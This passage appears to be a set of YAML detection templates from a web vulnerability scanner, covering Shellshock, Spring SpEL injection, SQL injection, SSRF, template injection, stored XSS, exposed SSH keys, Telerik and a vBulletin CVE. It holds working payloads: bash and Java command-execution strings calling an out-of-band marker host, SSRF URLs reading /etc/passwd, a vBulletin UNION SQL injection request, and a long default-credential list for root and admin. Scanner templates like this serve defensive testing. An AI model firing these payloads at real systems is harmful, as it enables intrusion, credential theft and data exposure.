20 | - threat: 80
21 | - tags:
22 | - Path Traversal
23 | - Arbitrary File Reading
24 | - Misconfiguration
25 | - Insecure Direct Object References
26 | - Broken Access Control
27 | - OWASP
28 | - OWASP Top-10
29 | - A4:2010
30 | - A4:2013
31 | - A5:2017
32 |
--------------------------------------------------------------------------------
/shellshock.yaml:
--------------------------------------------------------------------------------
1 | #Attention! For this DSL detect you must use a custom test policy with HEADER_* insertion point!
2 | collect:
3 | - uniq:
4 | - [URI]
5 |
6 | generate:
7 | - into: HEADER_USER-AGENT
8 | - method:
9 | - replace
10 | - payload:
11 | #CVE 2014-6271
12 | - "() { :; }; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH ;bash -c 'getent hosts DNS_MARKER'"
13 | - "() { :; }; echo; echo $((CALC_MARKER))"
14 | #CVE-2014-6278
15 | - "() { _; } >_[$($())] { echo; PATH=/usr/bin:/usr/local/bin:/bin; bash -c 'getent hosts DNS_MARKER'; }"
16 | - "() { _; } >_[$($())] { echo; echo $((CALC_MARKER)); }"
17 | #CVE-2014-7169
18 | - "() { (a)=>' echo -e \"Content-Type: text/plain\n\"; echo $((CALC_MARKER))"
19 |
20 | detect:
21 | - oob:
22 | - dns
23 | - response:
24 | - body: CALC_MARKER
25 | - headers: CALC_MARKER
26 |
27 |
28 | meta-info:
29 | - title: "Bash remote code execution vulnerability (ShellShock, CVE-2014-6271, CVE-2014-6278, CVE-2014-7169)"
30 | - type: "rce"
31 | - threat: 100
32 | - description: "This vulnerability allows remote attackers to execute arbitrary code via a crafted environment"
33 | - tags:
34 | - Bashdoor
35 | - shellshock
36 | - CVE 2014-6271
37 | - CVE-2014-6278
38 | - CVE-2014-7169
39 |
--------------------------------------------------------------------------------
/spel-oob.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [URI]
4 |
5 | generate:
6 | - payload:
7 | - "T(java.lang.Runtime).getRuntime().exec('getent hosts DNS_MARKER')/wlrm"
8 | - "new java.lang.ProcessBuilder({'getent hosts DNS_MARKER'}).start()"
9 |
10 | detect:
11 | - oob:
12 | - dns
13 |
14 | meta-info:
15 | - type: rce
16 | - threat: 95
17 | - tags:
18 | - SpEL injection
19 | - Spring
20 | - Spring Framework
21 | - Java
22 | - RCE
23 | - Remote Code Execution
24 | - OWASP Top 10
25 | - OWASP
26 | - CVE-2018-1273
27 |
--------------------------------------------------------------------------------
/splunkd-xml-feed.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/'
4 |
5 | detect:
6 | - response:
7 | - body: '<title>splunkd'
8 |
9 | meta-info:
10 | - type: info
11 | - threat: 30
12 | - applicable_for:
13 | - fast
14 | - scanner
15 | - tags:
16 | - Splunkd XML feed
17 | - Infoleak
18 | - Information Exposure
--------------------------------------------------------------------------------
/spring-cloud-infoleaks.yaml:
--------------------------------------------------------------------------------
1 | collect:
2 | - uniq:
3 | - [ URI ]
4 | generate:
5 | - payload:
6 | - env
7 | - dump
8 | - health
9 | - auditevents
10 | - beans
11 | - auditevents
12 | - conditions
13 | - autoconfi
14 | - flyway
15 | - heapdump
16 | - info
17 | - liquibase
18 | - logfile
19 | - loggers
20 | - metrics
21 | - prometheus
22 | - scheduledtasks
23 | - sessions
24 | - threaddump
25 | - configprops
26 | - into: ACTION_NAME
27 | - method:
28 | - replace
29 | detect:
30 | - response:
31 | - headers:
32 | - Content-Type: 'vnd.spring'
33 | - response:
34 | - body: java\.[a-z][a-z]
35 | meta-info:
36 | - type: info
37 | - threat: 80
38 | - tags:
39 | - Spring
40 | - Spring Cloud # TODO: CVE references
41 | - OWASP Top-10
42 | - Information Leak
43 | - Misconfiguration
44 | - Insecure Direct Object References
45 | - Broken Access Control
46 | - OWASP
47 | - OWASP Top-10
48 | - A4:2010
49 | - A4:2013
50 | - A5:2017
51 |
--------------------------------------------------------------------------------
/sqli-error-based.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - '''"\' # '"\ payload to cause any SQL-related crash
4 | - "'\\\""
5 | - '''"'
6 | - "wlrm'),\");\\'(%c0%67--"
7 | - method:
8 | - postfix
9 | detect:
10 | - response:
11 | - body: 'ERROR:.*LINE [0-9]+'
12 | - body: 'syntax error at'
13 | - body: 'sql error'
14 | - body: 'invalid input syntax for '
15 | - body: 'unterminated quoted string at'
16 | - body: 'SQL syntax.*?MySQL'
17 | - body: 'Warning.*?mysql_'
18 | - body: 'valid MySQL result'
19 | - body: 'MySqlClient\.'
20 | - body: 'PostgreSQL.*?ERROR'
21 | - body: 'Warning.*?(pg|PG)_/'
22 | - body: 'valid PostgreSQL result'
23 | - body: 'Npgsql\.'
24 | - body: 'Driver.*?SQL.*?Server'
25 | - body: 'OLE DB.*?SQL Server'
26 | - body: 'SQL Server.*?Driver'
27 | - body: 'Warning.*?mssql_'
28 | - body: 'SQL Server.*?[0-9a-fA-F]{8}'
29 | - body: 'Exception.*?System\.Data\.SqlClient\.'
30 | - body: 'Exception.*?Roadhouse\.Cms\.'
31 | - body: 'Microsoft Access Driver'
32 | - body: 'JET Database Engine'
33 | - body: 'Access Database Engine'
34 | - body: 'ORA-[0-9]{4}'
35 | - body: 'Oracle error'
36 | - body: 'Oracle.*?Driver'
37 | - body: 'Warning.*?(oci|OCI)_'
38 | - body: 'Warning.*?(ora|ORA)_'
39 | - body: 'CLI Driver.*?DB2'
40 | - body: 'DB2 SQL error'
41 | - body: 'SQLite\/JDBCDriver'
42 | - body: 'SQLite.*?Exception'
43 | - body: 'System.*?Data.*?SQLite.*?SQLiteException'
44 | - body: 'Warning.*?sqlite'
45 | - body: 'Warning.*?SQLite3::'
46 | - body: 'SQLITE_ERROR'
47 | - body: 'Warning.*?sybase'
48 | - body: 'Sybase message'
49 | - body: 'Sybase.*?Server message'
50 | - body: 'SybSQLException'
51 | - body: 'com\.sybase\.jdbc'
52 | - body: 'Warning.*?ingres_\.jdbc'
53 | - body: 'Ingres SQLSTATE'
54 | - body: 'Ingres.*?Driver'
55 | - body: 'Exception.*?Transaction rollback'
56 | - body: 'org\.hsqldb\.jdbc'
57 | - body: 'Unexpected end of command in statement'
58 | - body: 'Unexpected token.*?in statement'
59 | - body: 'Query failed: ERROR:'
60 | - body: 'System\.Data\.OleDb\.OleDbException'
61 | - body: 'SQL Server'
62 | - body: '\[Microsoft\]\[ODBC SQL Server Driver\]'
63 | - body: 'SQLServer JDBC Driver'
64 | - body: 'SqlException'
65 | - body: 'System\.Data\.SqlClient\.SqlException'
66 | - body: 'Unclosed quotation mark after the character string'
67 | - body: '''80040e14'''
68 | - body: 'mssql_query\(\)'
69 | - body: 'odbc_exec\(\)'
70 | - body: 'Microsoft OLE DB Provider for ODBC Drivers'
71 | - body: 'Microsoft OLE DB Provider for SQL Server'
72 | - body: 'Incorrect syntax near'
73 | - body: 'Sintaxis incorrecta cerca de'
74 | - body: 'Syntax error in string in query expression'
75 | - body: 'ADODB\.Field \(0x800A0BCD\)
'
76 | - body: 'Procedure.*?requires parameter.*?'
77 | - body: 'ADODB\.Recordset'
78 | - body: 'Unclosed quotation mark before the character string'
79 | - body: '''80040e07'''
80 | - body: 'Microsoft SQL Native Client error'
81 | - body: 'SQLCODE'
82 | - body: 'DB2 SQL error:'
83 | - body: 'SQLSTATE'
84 | - body: 'CLI Driver'
85 | - body: '\[DB2\/6000\]'
86 | - body: 'Sybase message:'
87 | - body: 'Sybase Driver'
88 | - body: 'SYBASE'
89 | - body: 'Syntax error in query expression'
90 | - body: 'Data type mismatch in criteria expression'
91 | - body: 'Microsoft JET Database Engine'
92 | - body: '\[Microsoft\]\[ODBC Microsoft Access Driver\]'
93 | - body: '(PLS|ORA)-[0-9][0-9][0-9][0-9]'
94 | - body: 'PostgreSQL query failed:'
95 | - body: 'supplied argument is not a valid PostgreSQL result'
96 | - body: 'pg_query\(\) \[:'
97 | - body: 'pg_exec\(\) \[:'
98 | - body: 'supplied argument is not a valid MySQL'
99 | - body: 'Column count doesn''t match value count at row'
100 | - body: 'mysql_fetch_array\(\)'
101 | - body: 'mysql_'
102 | - body: 'on MySQL result index'
103 | - body: 'You have an error in your SQL syntax;'
104 | - body: 'You have an error in your SQL syntax near'
105 | - body: 'MySQL server version for the right syntax to use'
106 | - body: '\[MySQL\]\[ODBC'
107 | - body: 'Column count doesn''t match'
108 | - body: 'the used select statements have different number of columns'
109 | - body: 'Table.*?doesn''t exist'
110 | - body: 'DBD::mysql::st execute failed'
111 | - body: 'DBD::mysql::db do failed'
112 | - body: 'com\.informix\.jdbc'
113 | - body: 'Dynamic Page Generation Error'
114 | - body: 'An illegal character has been found in the statement'
115 | - body: 'Informix'
116 | - body: 'DM_QUERY_E_SYNTAX'
117 | - body: 'has occurred in the vicinity of'
118 | - body: 'A Parser Error \(syntax error\)'
119 | - body: 'java\.sql\.SQLException'
120 | - body: 'Unexpected end of command in statement'
121 | - body: '\[Macromedia\]\[SQLServer JDBC Driver\]'
122 | - body: 'UPDATE .*? SET .*?'
123 | - body: 'INSERT INTO .*?'
124 | - body: 'Unknown column'
125 | - body: 'ERROR:\s*operator is not unique'
126 | - body: 'no such function'
127 | meta-info:
128 | - type: sqli
129 | - threat: 90
130 |
--------------------------------------------------------------------------------
/ssh-keys.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '.ssh'
4 |
5 | - method: 'GET'
6 | url: '.ssh.asp'
7 |
8 | - method: 'GET'
9 | url: '.ssh.php'
10 |
11 | - method: 'GET'
12 | url: '.ssh/id_dsa'
13 |
14 | - method: 'GET'
15 | url: '.ssh/id_rsa'
16 |
17 | - method: 'GET'
18 | url: '.ssh/id_rsa.key'
19 |
20 | - method: 'GET'
21 | url: '.ssh/id_rsa.key~'
22 |
23 | - method: 'GET'
24 | url: '.ssh/id_rsa.priv'
25 |
26 | - method: 'GET'
27 | url: '.ssh/id_rsa.priv~'
28 |
29 | - method: 'GET'
30 | url: '.ssh/id_rsa.pub'
31 |
32 | - method: 'GET'
33 | url: '.ssh/id_rsa.pub~'
34 |
35 | - method: 'GET'
36 | url: '.ssh/id_rsa~'
37 |
38 | - method: 'GET'
39 | url: 'id_dsa'
40 |
41 | - method: 'GET'
42 | url: 'id_dsa.ppk'
43 |
44 | - method: 'GET'
45 | url: 'id_rsa'
46 |
47 | - method: 'GET'
48 | url: 'id_rsa.pub'
49 |
50 | detect:
51 | - response:
52 | - body: '-----BEGIN RSA PRIVATE KEY-----'
53 | - body: '-----BEGIN ENCRYPTED PRIVATE KEY-----'
54 | - body: '-----BEGIN PUBLIC KEY-----'
55 | - body: '-----BEGIN DSA PRIVATE KEY-----'
56 | - body: 'ssh-rsa'
57 | - body: 'ssh-dsa'
58 |
59 | meta-info:
60 | - type: info
61 | - threat: 30
62 | - applicable_for:
63 | - fast
64 | - scanner
65 | - tags:
66 | - Information Exposure
67 | - ssh authorized_keys
--------------------------------------------------------------------------------
/ssrf-rechecker-lfi.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - 'netdoc:///etc/passwd'
4 | - 'file:///etc/passwd'
5 | - 'file://c:\windows\system32\drivers\etc\networks'
6 | - method:
7 | - replace
8 | detect:
9 | - response:
10 | - body: '# campus 284.122.107'
11 | - body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
12 | meta-info:
13 | - type: rce
14 | - threat: 70
15 | - title: "Server Side Request Forgery (SSRF)"
16 | - description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)."
17 | - applicable_for: ["attack_rechecker"]
18 | - tags:
19 | - SSRF
20 | - Server Side Request Forgery
21 | - CWE-918
22 |
--------------------------------------------------------------------------------
/ssrf-rechecker-oob.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - 'DNS_MARKER'
4 | - 'http://DNS_MARKER/'
5 | - 'http://DNS_MARKER &@2.2.2.2# @3.3.3.3/'
6 | - 'http://1.1.1.1 &@DNS_MARKER# @3.3.3.3/'
7 | - 'http://1.1.1.1 &@2.2.2.2# @DNS_MARKER/'
8 | - 'http://127.1.1.1:80\@DNS_MARKER:80/'
9 | - 'http://127.1.1.1:80\@@DNS_MARKER:80/'
10 | - 'http://127.1.1.1:80:\@@DNS_MARKER:80/'
11 | - 'http://127.1.1.1:80#\@DNS_MARKER:80/'
12 | - 'jar:http://DNS_MARKER!/'
13 | - 'dict://DNS_MARKER:11111/'
14 | - 'sftp://DNS_MARKER:8022/'
15 | - 'tftp://DNS_MARKER:69/somefile'
16 | - 'ldap://DNS_MARKER:389/%0astats%0aquit'
17 | - 'gopher://DNS_MARKER:70/'
18 | - method:
19 | - replace
20 | detect:
21 | - oob:
22 | - dns
23 | meta-info:
24 | - type: rce
25 | - threat: 70
26 | - title: "Server Side Request Forgery (SSRF)"
27 | - description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)."
28 | - applicable_for: ["attack_rechecker"]
29 | - tags:
30 | - SSRF
31 | - Server Side Request Forgery
32 | - CWE-918
33 |
--------------------------------------------------------------------------------
/ssrf.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - "DNS_MARKER" # like ?link=r4nd0m.wlrm.tl
4 | - "http://DNS_MARKER/"
5 | - method:
6 | - replace
7 | detect:
8 | - oob:
9 | - dns
10 | meta-info:
11 | - type: ssrf
12 | - threat: 70
13 | - tags:
14 | - SSRF
15 | - Server Side Request Forgery
16 | - Link Injection # TODO: OWASP and CWE references
17 |
--------------------------------------------------------------------------------
/ssti.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - ${CALC_MARKER}{php}echo CALC_MARKER;{/php}{{CALC_MARKER}}${{CALC_MARKER}}<%= CALC_MARKER %>
4 | - method:
5 | - postfix
6 | detect:
7 | - response:
8 | - body: CALC_MARKER
9 | meta-info:
10 | - type: ssti
11 | - threat: 95
12 | - tags:
13 | - OS Commanding
14 | - RCE
15 | - Remote Code Execution
16 | - Template Injection
17 | - Server Side Template Injection
18 | - OWASP Top 10
19 | - OWASP # TODO: CWE and WASC references
20 |
--------------------------------------------------------------------------------
/stored-xss-oob.yaml:
--------------------------------------------------------------------------------
1 | generate:
2 | - payload:
3 | - ">![](\"http://DNS_MARKER\")
<"
4 | - ">"
5 | - method:
6 | - postfix
7 | detect:
8 | - delayed_oob:
9 | - dns
10 | meta-info:
11 | - applicable_for:
12 | - attack_rechecker
13 | - threat: 70
14 | - type: xss
15 |
--------------------------------------------------------------------------------
/telerik-infoleaks.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'GET'
3 | url: '/Telerik.Web.UI.DialogHandler.aspx?checkHandler=true'
4 |
5 | detect:
6 | - response:
7 | - body: 'HandlerCheckOK'
8 | - body: 'Telerik.Web.UI.WebResource.*Version=(2007.1423|2007.1521|2007.1626|2007.2918|2007.21010|2007.21107|2007.31218|2007.31314|2007.31425|2008.1415|2008.1515|2008.1619|2008.2723|2008.2826|2008.21001|2008.31105|2008.31125|2008.31314|2009.1311|2009.1402|2009.1527|2009.2701|2009.2826|2009.31103|2009.31208|2009.31314|2010.1309|2010.1415|2010.1519|2010.2713|2010.2826|2010.2929|2010.31109|2010.31215|2010.31317|2011.1315|2011.1413|2011.1519|2011.2712|2011.2915|2011.31115|2011.3.1305|2012.1.215|2012.1.411|2012.2.607|2012.2.724|2012.2.912|2012.3.1016|2012.3.1205|2012.3.1308|2013.1.220|2013.1.403|2013.1.417|2013.2.611|2013.2.717|2013.3.1015|2013.3.1114|2013.3.1324|2014.1.225|2014.1.403|2014.2.618|2014.2.724|2014.3.1024|2015.1.204|2015.1.225|2015.1.401|2015.2.604|2015.2.623|2015.2.729|2015.2.826|2015.3.930|2015.3.1111|2016.1.113|2016.1.225|2016.2.504|2016.2.607|2016.3.914|2016.3.1018|2016.3.1027|2017.1.118|2017.1.228|2017.2.503|2017.2.621|2017.2.711|2017.3.913)'
9 |
10 | meta-info:
11 | - type: info
12 | - threat: 67
13 | - applicable_for:
14 | - fast
15 | - tags:
16 | - Telerik Web UI
17 | - Possible RCE
18 | - Access to Document Managment
19 | - CVE-2017-9248
20 | - Telerik Web ASP
21 | - OWASP Top 10
22 | - OWASP
23 | - CVE-2017-9248
--------------------------------------------------------------------------------
/vBulletin_CVE-2020-12720.yaml:
--------------------------------------------------------------------------------
1 | send:
2 | - method: 'POST'
3 | url: '/ajax/api/content_infraction/getIndexableContent'
4 | headers:
5 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8
6 | - X-REQUESTED-WITH: XMLHttpRequest
7 | body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--"
8 |
9 | - method: 'POST'
10 | url: '/forum/ajax/api/content_infraction/getIndexableContent'
11 | headers:
12 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8
13 | - X-REQUESTED-WITH: XMLHttpRequest
14 | body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--"
15 |
16 | - method: 'POST'
17 | url: '/forums/ajax/api/content_infraction/getIndexableContent'
18 | headers:
19 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8
20 | - X-REQUESTED-WITH: XMLHttpRequest
21 | body: "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--"
22 |
23 | - method: 'POST'
24 | url: '/'
25 | headers:
26 | - CONTENT-TYPE: application/x-www-form-urlencoded; charset=UTF-8
27 | - X-REQUESTED-WITH: XMLHttpRequest
28 | body: "routestring=ajax/api/content_infraction/getIndexableContent&nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,CHAR(119,108,114,109,45,115,113,108,105,45,99,104,101,99,107,45,106,120,115,104,119),8,7,6,5,4,3,2,1--"
29 |
30 | detect:
31 | - response:
32 | - body: 'wlrm-sqli-check-jxshw'
33 |
34 | meta-info:
35 | - type: sqli
36 | - threat: 98
37 | - applicable_for:
38 | - fast
39 | - scanner
40 | - title: "SQL injection in vBulletin (CVE-2020-12720)"
41 | - description: "Improper access control for the 'nodeId' parameter allows attackers to execute arbitrary SQL commands. A successful exploitation of SQLi could result in reading sensitive data from the database, modifying this data, and in some cases even execution of arbitrary commands in the OS. Known affected software configurations vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1."
42 | - additional: "To resolve this vulnerability, the software should be updated to the current version."
43 | - tags:
44 | - CVE-2020-12720
45 | - vBulletin
46 |
--------------------------------------------------------------------------------
/weak-basic-auth.yaml:
--------------------------------------------------------------------------------
1 | #Attention! For this DSL detect you must use a custom test policy with HEADER_* insertion point!
2 | collect:
3 | - uniq:
4 | - [URI]
5 |
6 | match:
7 | - 'HEADER_AUTHORIZATION_value': '^(Basic|Digest)'
8 |
9 | generate:
10 | - into: HEADER_AUTHORIZATION
11 | - method:
12 | - replace
13 | - payload:
14 | - "BASIC cm9vdDo=" #root:
15 | - "BASIC cm9vdDohUUFaMndzeA==" #root:!QAZ2wsx
16 | - "BASIC cm9vdDohcWF6QHdzeA==" #root:!qaz@wsx
17 | - "BASIC cm9vdDowMDAw" #root:0000
18 | - "BASIC cm9vdDowMDAwMDA=" #root:000000
19 | - "BASIC cm9vdDowMDAwMDAw" #root:0000000
20 | - "BASIC cm9vdDowMDAwMDAwMA==" #root:00000000
21 | - "BASIC cm9vdDowOTg3NjU0MzIx" #root:0987654321
22 | - "BASIC cm9vdDow" #root:0
23 | - "BASIC cm9vdDox" #root:1
24 | - "BASIC cm9vdDoy" #root:2
25 | - "BASIC cm9vdDoz" #root:3
26 | - "BASIC cm9vdDo0" #root:4
27 | - "BASIC cm9vdDo1" #root:5
28 | - "BASIC cm9vdDo2" #root:6
29 | - "BASIC cm9vdDo3" #root:7
30 | - "BASIC cm9vdDo4" #root:8
31 | - "BASIC cm9vdDo5" #root:9
32 | - "BASIC cm9vdDoxMTEx" #root:1111
33 | - "BASIC cm9vdDoxMTExMQ==" #root:11111
34 | - "BASIC cm9vdDoxMTExMTE=" #root:111111
35 | - "BASIC cm9vdDoxMTExMTEx" #root:1111111
36 | - "BASIC cm9vdDoxMTExMTExMQ==" #root:11111111
37 | - "BASIC cm9vdDoxMTIyMzM=" #root:112233
38 | - "BASIC cm9vdDoxMjEyMTI=" #root:121212
39 | - "BASIC cm9vdDoxMjM=" #root:123
40 | - "BASIC cm9vdDoxMjMxMjM=" #root:123123
41 | - "BASIC cm9vdDoxMjMzMjE=" #root:123321
42 | - "BASIC cm9vdDoxMjM0" #root:1234
43 | - "BASIC cm9vdDoxMjM0NQ==" #root:12345
44 | - "BASIC cm9vdDoxMjM0NTY=" #root:123456
45 | - "BASIC cm9vdDoxMjM0NTY3" #root:1234567
46 | - "BASIC cm9vdDoxMjM0NTY3OA==" #root:12345678
47 | - "BASIC cm9vdDoxMjM0NTY3ODk=" #root:123456789
48 | - "BASIC cm9vdDoxMjM0NTY3ODkw" #root:1234567890
49 | - "BASIC cm9vdDoxMjM0YWJjZA==" #root:1234abcd
50 | - "BASIC cm9vdDoxMjM0cXdlcg==" #root:1234qwer
51 | - "BASIC cm9vdDoxMjNhYmM=" #root:123abc
52 | - "BASIC cm9vdDoxMjNhc2Q=" #root:123asd
53 | - "BASIC cm9vdDoxMjNxd2U=" #root:123qwe
54 | - "BASIC cm9vdDoxMjNxd2Vhc2Q=" #root:123qweasd
55 | - "BASIC cm9vdDoxMnF3YXN6eA==" #root:12qwaszx
56 | - "BASIC cm9vdDoxZTJlM2U=" #root:1e2e3e
57 | - "BASIC cm9vdDoxZTJlM2U0ZQ==" #root:1e2e3e4e
58 | - "BASIC cm9vdDoxcTJxM3E=" #root:1q2q3q
59 | - "BASIC cm9vdDoxcTJxM3E0cQ==" #root:1q2q3q4q
60 | - "BASIC cm9vdDoxcTJ3M2U=" #root:1q2w3e
61 | - "BASIC cm9vdDoxcTJ3M2U0cg==" #root:1q2w3e4r
62 | - "BASIC cm9vdDoxcTJ3M2U0cjV0" #root:1q2w3e4r5t
63 | - "BASIC cm9vdDoxcWF6MndzeA==" #root:1qaz2wsx
64 | - "BASIC cm9vdDoxcWF6MndzeDNlZGM=" #root:1qaz2wsx3edc
65 | - "BASIC cm9vdDoxcWF6eHN3Mg==" #root:1qazxsw2
66 | - "BASIC cm9vdDoxcWF6WFNXQA==" #root:1qazXSW@
67 | - "BASIC cm9vdDoxdzJxIVdAUQ==" #root:1w2q!W@Q
68 | - "BASIC cm9vdDoxdzJ3M3c=" #root:1w2w3w
69 | - "BASIC cm9vdDoxdzJ3M3c0dw==" #root:1w2w3w4w
70 | - "BASIC cm9vdDo1NDMyMQ==" #root:54321
71 | - "BASIC cm9vdDo2NTQzMjE=" #root:654321
72 | - "BASIC cm9vdDo4ODg4ODg=" #root:888888
73 | - "BASIC cm9vdDph" #root:a
74 | - "BASIC cm9vdDphYmMxMjM=" #root:abc123
75 | - "BASIC cm9vdDphYmNkMTIzNA==" #root:abcd1234
76 | - "BASIC cm9vdDpBZG1pbg==" #root:Admin
77 | - "BASIC cm9vdDphZG1pbg==" #root:admin
78 | - "BASIC cm9vdDphZG1pbiFA" #root:admin!@
79 | - "BASIC cm9vdDphZG1pbjE=" #root:admin1
80 | - "BASIC cm9vdDphZG1pbjEy" #root:admin12
81 | - "BASIC cm9vdDphZG1pbjEyMw==" #root:admin123
82 | - "BASIC cm9vdDphZG1pbjEyMzQ1Ng==" #root:admin123456
83 | - "BASIC cm9vdDphZG1pbmlzdHJhdG9y" #root:administrator
84 | - "BASIC cm9vdDphbHBpbmU=" #root:alpine
85 | - "BASIC cm9vdDphc2QxMjM=" #root:asd123
86 | - "BASIC cm9vdDphc2Rm" #root:asdf
87 | - "BASIC cm9vdDphc2RmMTIzNA==" #root:asdf1234
88 | - "BASIC cm9vdDphc2RmZ2g=" #root:asdfgh
89 | - "BASIC cm9vdDpjZW50b3M=" #root:centos
90 | - "BASIC cm9vdDpjaGFuZ2VtZQ==" #root:changeme
91 | - "BASIC cm9vdDpjaXNjbw==" #root:cisco
92 | - "BASIC cm9vdDpjaXNjbzEyMw==" #root:cisco123
93 | - "BASIC cm9vdDpkZWZhdWx0" #root:default
94 | - "BASIC cm9vdDppZGMhQA==" #root:idc!@
95 | - "BASIC cm9vdDpqaWFtaW1h" #root:jiamima
96 | - "BASIC cm9vdDpsZXRtZWlu" #root:letmein
97 | - "BASIC cm9vdDpsaW51eA==" #root:linux
98 | - "BASIC cm9vdDptYW5hZ2Vy" #root:manager
99 | - "BASIC cm9vdDptYXN0ZXI=" #root:master
100 | - "BASIC cm9vdDpvcmFjbGU=" #root:oracle
101 | - "BASIC cm9vdDpwQCQkdzByZA==" #root:p@$$w0rd
102 | - "BASIC cm9vdDpQQHNzdzByZA==" #root:P@ssw0rd
103 | - "BASIC cm9vdDpwQHNzdzByZA==" #root:p@ssw0rd
104 | - "BASIC cm9vdDpQQHNzdzByZCE=" #root:P@ssw0rd!
105 | - "BASIC cm9vdDpwQHNzd29yZA==" #root:p@ssword
106 | - "BASIC cm9vdDpwYTU1dzByZA==" #root:pa55w0rd
107 | - "BASIC cm9vdDpwYXNz" #root:pass
108 | - "BASIC cm9vdDpwYXNzdzByZA==" #root:passw0rd
109 | - "BASIC cm9vdDpwYXNzd29yZA==" #root:password
110 | - "BASIC cm9vdDpwYXNzd29yZDEyMw==" #root:password123
111 | - "BASIC cm9vdDpxMXcyZTM=" #root:q1w2e3
112 | - "BASIC cm9vdDpxMXcyZTNyNA==" #root:q1w2e3r4
113 | - "BASIC cm9vdDpxMXcyZTNyNHQ1" #root:q1w2e3r4t5
114 | - "BASIC cm9vdDpxYXp3c3hlZGM=" #root:qazwsxedc
115 | - "BASIC cm9vdDpxd2UxMjM=" #root:qwe123
116 | - "BASIC cm9vdDpxd2VyMTIzNA==" #root:qwer1234
117 | - "BASIC cm9vdDpxd2VydHk=" #root:qwerty
118 | - "BASIC cm9vdDpxd2VydHkxMjM=" #root:qwerty123
119 | - "BASIC cm9vdDpyZWRoYXQ=" #root:redhat
120 | - "BASIC cm9vdDpyb290" #root:root
121 | - "BASIC cm9vdDpyb290MTIz" #root:root123
122 | - "BASIC cm9vdDpyb290MTIzNA==" #root:root1234
123 | - "BASIC cm9vdDpyb290QDEyMw==" #root:root@123
124 | - "BASIC cm9vdDpyb290cm9vdA==" #root:rootroot
125 | - "BASIC cm9vdDpzZXJ2ZXI=" #root:server
126 | - "BASIC cm9vdDpzdXBlcnVzZXI=" #root:superuser
127 | - "BASIC cm9vdDpzeXN0ZW0=" #root:system
128 | - "BASIC cm9vdDpUZXN0" #root:Test
129 | - "BASIC cm9vdDp0ZXN0" #root:test
130 | - "BASIC cm9vdDp0ZXN0MTIz" #root:test123
131 | - "BASIC cm9vdDp0b29y" #root:toor
132 | - "BASIC cm9vdDp1Ym50" #root:ubnt
133 | - "BASIC cm9vdDp1YnVudHU=" #root:ubuntu
134 | - "BASIC cm9vdDpVc2Vy" #root:User
135 | - "BASIC cm9vdDp1c2Vy" #root:user
136 | - "BASIC cm9vdDp2bXdhcmU=" #root:vmware
137 | - "BASIC cm9vdDp3ZWxjb21l" #root:welcome
138 | - "BASIC cm9vdDp3dWJhbw==" #root:wubao
139 | - "BASIC cm9vdDp6YXExMndzeA==" #root:zaq12wsx
140 | - "BASIC cm9vdDp6eGN2Ym4=" #root:zxcvbn
141 | - "BASIC cm9vdDp6eGN2Ym5t" #root:zxcvbnm
142 | - "BASIC cm9vdDpjaGFuZ2VpdA==" #root:changeit
143 | - "BASIC YWRtaW46" #admin:
144 | - "BASIC YWRtaW46IVFBWjJ3c3g=" #admin:!QAZ2wsx
145 | - "BASIC YWRtaW46IXFhekB3c3g=" #admin:!qaz@wsx
146 | - "BASIC YWRtaW46MDAwMA==" #admin:0000
147 | - "BASIC YWRtaW46MDAwMDAw" #admin:000000
148 | - "BASIC YWRtaW46MDAwMDAwMA==" #admin:0000000
149 | - "BASIC YWRtaW46MDAwMDAwMDA=" #admin:00000000
150 | - "BASIC YWRtaW46MDk4NzY1NDMyMQ==" #admin:0987654321
151 | - "BASIC YWRtaW46MA==" #admin:0
152 | - "BASIC YWRtaW46MQ==" #admin:1
153 | - "BASIC YWRtaW46Mg==" #admin:2
154 | - "BASIC YWRtaW46Mw==" #admin:3
155 | - "BASIC YWRtaW46NA==" #admin:4
156 | - "BASIC YWRtaW46NQ==" #admin:5
157 | - "BASIC YWRtaW46Ng==" #admin:6
158 | - "BASIC YWRtaW46Nw==" #admin:7
159 | - "BASIC YWRtaW46OA==" #admin:8
160 | - "BASIC YWRtaW46OQ==" #admin:9
161 | - "BASIC YWRtaW46MTExMQ==" #admin:1111
162 | - "BASIC YWRtaW46MTExMTE=" #admin:11111
163 | - "BASIC YWRtaW46MTExMTEx" #admin:111111
164 | - "BASIC YWRtaW46MTExMTExMQ==" #admin:1111111
165 | - "BASIC YWRtaW46MTExMTExMTE=" #admin:11111111
